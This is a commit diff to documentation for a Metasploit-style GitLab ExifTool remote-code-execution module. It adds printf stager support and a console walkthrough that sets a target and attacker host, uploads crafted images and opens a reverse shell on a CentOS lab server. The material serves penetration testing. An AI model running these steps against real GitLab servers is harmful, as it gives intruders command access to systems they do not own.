Enabled use of cmdstager::flavor printf. Tested against a CentOS install. Updated docs. Default to MeterpreterTryToFork and enabled autocheck

documentation/modules/exploit/multi/http/gitlab_exif_rce.md

@@ -34,12 +34,13 @@ Exploitation will result in command execution as the git user.
 
 ### 0
 
-This targets GitLab with the `reverse_openssl` payload and returns a reverse shell.
+By default, this targets GitLab with the `reverse_openssl` payload and returns a reverse shell.
 
 ### 1
 
-This downloads code to GitLab returns a meterpreter session. By default, the module uses `wget`, but
-can also be used with `lwprequest` and `curl.`
+By default, this target obtains a meterpreter session using `wget`. This target also supports
+`lwprequest`, `curl`, and `printf`. However, due to the exploit's space constraints it's not
+recommended to use a meterpreter payload with `printf` due to the time it will take to write the payload.
 
 ## Options
 
@@ -143,6 +144,53 @@ msf6 exploit(multi/http/gitlab_exif_rce) > run
 meterpreter > 
 ```
 
+### GitLab 13.10.2 on CentOS 8. Get reverse shell using printf / reverse_tcp
+
+```
+msf6 > use exploits/multi/http/gitlab_exif_rce
+[*] Using configured payload linux/x86/meterpreter_reverse_tcp
+msf6 exploit(multi/http/gitlab_exif_rce) > set RHOST 10.0.0.7
+RHOST => 10.0.0.7
+msf6 exploit(multi/http/gitlab_exif_rce) > set LHOST 10.0.0.9
+LHOST => 10.0.0.9
+msf6 exploit(multi/http/gitlab_exif_rce) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(multi/http/gitlab_exif_rce) > set CmdStager::Flavor printf
+CmdStager::Flavor => printf
+msf6 exploit(multi/http/gitlab_exif_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.9:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading W1tHrzXkK.jpg to /mopoTKJq
+[+] The target is vulnerable. The error response indicates ExifTool was executed.
+[*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
+[*] Uploading aVTK6SM33.jpg to /NySTvN3J
+[+] Exploit successfully executed.
+[*] Command Stager progress -  17.76% done (143/805 bytes)
+[*] Uploading uOQXfShf.jpg to /0vHnowZA8ftJ
+[+] Exploit successfully executed.
+[*] Command Stager progress -  35.40% done (285/805 bytes)
+[*] Uploading Ov2VCdIih.jpg to /NefATU
+[+] Exploit successfully executed.
+[*] Command Stager progress -  53.04% done (427/805 bytes)
+[*] Uploading lYJsr5whY.jpg to /TOLaoA1q
+[+] Exploit successfully executed.
+[*] Command Stager progress -  70.68% done (569/805 bytes)
+[*] Uploading MwuCYLqHh.jpg to /lMTzzMxXjFye
+[+] Exploit successfully executed.
+[*] Command Stager progress -  88.20% done (710/805 bytes)
+[*] Uploading dkp8oskGlDJI.jpg to /VglvVbpx
+[*] Sending stage (36 bytes) to 10.0.0.7
+[+] Exploit successfully executed.
+[*] Command Stager progress - 100.00% done (805/805 bytes)
+[*] Command shell session 1 opened (10.0.0.9:4444 -> 10.0.0.7:48694 ) at 2021-11-03 08:34:02 -0700
+
+id
+uid=973(git) gid=972(git) groups=972(git) context=system_u:system_r:unconfined_service_t:s0
+whoami
+git
+```
+
 ### GitLab 13.10.2 on Ubuntu 20.04.2 x64. Get reverse shell.
 
 ```
@@ -170,7 +218,7 @@ msf6 exploit(multi/http/gitlab_exif_rce) > set LHOST 10.0.0.9
 LHOST => 10.0.0.9
 msf6 exploit(multi/http/gitlab_exif_rce) > exploit
 
-[*] Started reverse double SSL handler on 10.0.0.9:4444 
+[*] Started reverse double SSL handler on 10.0.0.9:4444
 [*] Executing Unix Command for cmd/unix/reverse_openssl
 [*] Uploading 1SynV6Z.jpg to /9v3LPsOOBuH
 [*] Accepted the first client connection...
@@ -197,24 +245,18 @@ pwd
 ### GitLab 14.4.1 on Ubuntu 20.04.2 x64. Unable to exploit.
 
 ```
-msf6 > use exploit/multi/http/gitlab_exif_rce
+msf6 > use exploits/multi/http/gitlab_exif_rce
 [*] Using configured payload linux/x86/meterpreter_reverse_tcp
 msf6 exploit(multi/http/gitlab_exif_rce) > set RHOST 10.0.0.6
 RHOST => 10.0.0.6
-msf6 exploit(multi/http/gitlab_exif_rce) > check
-
-[*] Uploading IG6XQAk1ITK.jpg to /jL4v4tk
-[*] 10.0.0.6:80 - The target is not exploitable. The error response indicates ExifTool was not run.
 msf6 exploit(multi/http/gitlab_exif_rce) > set LHOST 10.0.0.9
 LHOST => 10.0.0.9
 msf6 exploit(multi/http/gitlab_exif_rce) > exploit
 
 [*] Started reverse TCP handler on 10.0.0.9:4444 
-[*] Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
-[*] Using URL: http://0.0.0.0:8080/4yaJ5UgZuicSKho
-[*] Local IP: http://10.0.0.9:8080/4yaJ5UgZuicSKho
-[*] Uploading 0HOfSW4x.jpg to /U9lBc32XRIS
-[-] Exploit aborted due to failure: unexpected-reply: Target replied with an unexpected response
-[*] Server stopped.
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading NUvUyPiyKL3.jpg to /PT2hiCf47
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The error response indicates ExifTool was not run. "set ForceExploit true" to override check result.
 [*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/gitlab_exif_rce) > 
 ```